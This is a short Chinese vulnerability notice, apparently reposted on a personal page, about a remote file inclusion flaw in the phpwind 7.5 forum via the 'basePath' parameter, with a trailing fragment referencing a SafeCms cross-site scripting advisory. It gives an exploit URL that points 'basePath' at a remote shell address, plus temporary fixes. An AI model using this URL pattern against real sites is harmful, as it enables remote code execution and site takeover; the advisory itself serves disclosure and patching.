phpwind 7.5论坛程序漏洞与0day
2010年1月23日星期六 | | | 提示:内容中所含EXP、攻击测试代码不可用于非法用途,仅供安全人士参考
漏洞说明:
程序basePath参数引发的文件包含漏洞
利用方法:
http://www.xxx.com/apps/groups/index.php?route=groups&basePath=shell地址
临时解决方法:
1.将basePath进行过滤
如果过滤的代码包括:http,/,%
2.关闭apps引用模块
信息来源: http://www.tosec.cn/bug/7213.html
我的QQ空间

SafeCms <= 2.0.1.0 Beta Cross Site Scripting
SSV ID:15203发布时间:2010-01-07测试方法:[www.sebug.net]本站...